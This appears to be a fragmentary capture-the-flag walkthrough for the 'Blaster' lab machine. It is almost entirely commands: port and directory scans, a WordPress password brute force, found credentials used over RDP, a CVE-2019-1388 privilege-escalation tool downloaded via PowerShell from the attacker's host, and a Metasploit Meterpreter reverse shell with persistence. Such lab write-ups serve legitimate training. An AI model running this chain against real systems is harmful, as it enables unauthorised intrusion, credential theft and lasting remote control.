Blaster
Initial Scan
nmap -A $VICTIM
Scan all ports

TCP/80 - HTTP





Shell



TCP/3389 - RDP

Privilege Escalation












Metasploit


Last updated
nmap -A $VICTIM
























Last updated
nmap -sV -sT -O -p 1-65535 $VICTIMgobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txtgobuster dir -u http://$VICTIM/retro -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txtwpscan --url http://$VICTIM/retrowpscan --url http://$VICTIM/retro --enumerate uwpscan --url http://$VICTIM/retro --passwords /usr/share/wordlists/rockyou.txtUsername: wade
Password: parzivalxfreerdp +clipboard /u:"wade" /v:$VICTIM:3389 /size:1024x568 /smart-sizing:800x1200
Password: parzivalgit clone https://github.com/suprise4u/CVE-2019-1388.git
cd CVE-2019-1388/
python2 -m SimpleHTTPServer 81powershell -ep bypass
powershell "(New-Object System.Net.WebClient).Downloadfile('http://$KALI:81/HHUPD.EXE','HHUPD.EXE')" msfconsole
use exploit/multi/script/web_delivery
show targets
set target 2
set LHOST 10.10.75.198
set srvport 8082
set payload windows/meterpreter/reverse_http
run -jrun exploit/windows/local/persistence -X